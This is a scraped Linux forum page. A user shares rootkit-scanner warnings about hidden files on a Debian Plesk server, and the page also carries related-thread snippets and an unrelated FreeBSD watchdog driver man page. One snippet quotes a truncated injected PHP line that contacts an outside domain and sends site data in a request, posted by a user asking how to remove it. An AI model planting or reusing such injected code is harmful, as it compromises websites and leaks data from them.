Sponsored Content
Full Discussion: Malicious perl script
Operating Systems Linux Debian Malicious perl script Post 302992371 by dadprpus on Friday 24th of February 2017 08:38:30 AM
Old 02-24-2017
I do have Plesk and it is very user friendly. I have installed "watchdog" and it runs a script periodically and sends me an email. No viruses found but it did come up with this:
Code:
[14:28:03] Info: SCAN_MODE_DEV set to 'THOROUGH'
[14:28:04]   Checking /dev for suspicious file types         [ Warning ]
[14:28:04] Warning: Suspicious file types found in /dev:
[14:28:04]          /dev/shm/R1Soft-SHM-ZocPNFWuCcEl2rrN: data
[14:28:04]   Checking for hidden files and directories       [ Warning ]
[14:28:04] Warning: Hidden directory found: /dev/.udev
[14:28:04] Warning: Hidden file found: /usr/share/man/man1/..1.gz: gzip compressed data, from Unix, max compression
[14:28:04] Warning: Hidden file found: /usr/share/man/man5/.k5login.5.gz: gzip compressed data, from Unix, max compression
[14:28:04] Warning: Hidden file found: /usr/share/man/man5/.k5identity.5.gz: gzip compressed data, from Unix, max compression
[14:28:04] Warning: Hidden file found: /usr/bin/.fipscheck.hmac: ASCII text
[14:28:04] Warning: Hidden file found: /usr/bin/.ssh.hmac: ASCII text
[14:28:04] Warning: Hidden file found: /usr/sbin/.sshd.hmac: ASCII text


Moderator's Comments:
Mod Comment Please use CODE tags as required by forum rules!

Last edited by RudiC; 02-24-2017 at 10:14 AM.. Reason: Added CODE tags.
 

7 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

remove malicious codes from a file

Hello, Please advise a script/command to remove the following line for a file <?php error_reporting(0); $fn = "googlesindication.cn"; $fp = fsockopen($fn, 80, $errno, $errstr, 15); if (!$fp) { } else { $query='site='.$_SERVER; $out = "GET /links.php?".$query." HTTP/1.1\r\n"; ... (5 Replies)
Discussion started by: fed.linuxgossip
5 Replies

2. Shell Programming and Scripting

Anti-malicious files and viruses

Hello I ask you how to make a Anti-malicious files and viruses Or if one of you a small example of the work on the same place and I hope my request I want a small patch or the process of examination Virus http://www.google.jo/images/cleardot.gif ---------- Post updated... (1 Reply)
Discussion started by: x-zer0
1 Replies

3. Cybersecurity

How to analyze malicious code

A series on The H about analyzing potentially malicious code flying around on the net. Pretty well written, and a nice read for those interested in how exploits work: CSI:Internet - Alarm at the pizza service CSI:Internet - The image of death CSI:Internet - PDF timebomb CSI:Internet -... (0 Replies)
Discussion started by: pludi
0 Replies

4. Shell Programming and Scripting

calling a perl script with arguments from a parent perl script

I am trying to run a perl script which needs input arguments from a parent perl script, but doesn't seem to work. Appreciate your help in this regard. From parent.pl $input1=123; $input2=abc; I tried calling it with system("/usr/bin/perl child.pl $input1 $input2"); and `perl... (1 Reply)
Discussion started by: grajp002
1 Replies

5. Shell Programming and Scripting

Perl : embedding java script with cgi perl script

Hi All, I am aware that html tags can be embedded in cgi script as below.. In the same way is it possible to embed the below javascript in perl cgi script ?? print("<form action="action.htm" method="post" onSubmit="return submitForm(this.Submitbutton)">"); print("<input type = "text"... (1 Reply)
Discussion started by: scriptscript
1 Replies

6. Shell Programming and Scripting

Malicious pl script, what does it do

Hello, i found and malicious looking script on my server, here is its code safelly pasted as a text on pastebin: Posting links to pastebin scripts are forbidden at this site. Please what does this script do? It has .pl extension and is on shared cpanel hosting account (1 Reply)
Discussion started by: postcd
1 Replies

7. Programming

PERL: In a perl-scripttTrying to execute another perl-script that SETS SOME VARIABLES !

I have reviewed many examples on-line about running another process (either PERL or shell command or a program), but do not find any usefull for my needs way. (Reviewed and not useful the system(), 'back ticks', exec() and open()) I would like to run another PERL-script from first one, not... (1 Reply)
Discussion started by: alex_5161
1 Replies
WBWD(4) 						   BSD Kernel Interfaces Manual 						   WBWD(4)

NAME
wbwd -- device driver for watchdog timer found on Winbond Super I/O chips SYNOPSIS
To compile this driver into the kernel, place the following line in your kernel configuration file: device wbwd Alternatively, to load the driver as a module at boot time, place the following line in loader.conf(5): wbwd_load="YES" DESCRIPTION
The wbwd driver provides watchdog(4) support for the watchdog interrupt timer present on at least the following Winbond Super I/O chips: o 83627HF/F/HG/G Rev. G o 83627HF/F/HG/G Rev. J o 83627HF/F/HG/G Rev. UD-A o 83627DHG IC ver. 5 SYSCTL VARIABLES
The wbwd driver provides the following options as sysctl(8) variables. dev.wbwd.0.timeout_override This variable allows to program the timer to a value independent on the one provided by the watchdog(4) framework while still relying on the regular updates from e.g. watchdogd(8). This is particularly useful if your system provides multiple watchdogs and you want them to fire in a special sequence to trigger an NMI after a shorter period than the reset timeout for example. The value set must not be lower than the sleep time of watchdogd(8). A value of 0 disables this feature and the timeout value provided by watchdog(4) will be used. dev.wbwd.0.debug_verbose If set this sysctl will tell the driver to log its current state before and after the timer reset on each invocation from watchdog(9) to the kernel message buffer for debugging. dev.wbwd.0.debug This read-only value gives the state of some registers on last update. The wbwd driver also provides further sysctl options that are hidden by default. See the source code for more information. SEE ALSO
watchdog(4), device.hints(5), watchdog(8), watchdogd(8), watchdog(9) HISTORY
The wbwd driver first appeared in FreeBSD 10.0. AUTHORS
This manual page was written by Bjoern A. Zeeb <bz@FreeBSD.org>. BSD
December 28, 2012 BSD
All times are GMT -4. The time now is 03:38 PM.
Unix & Linux Forums Content Copyright 1993-2022. All Rights Reserved.
Privacy Policy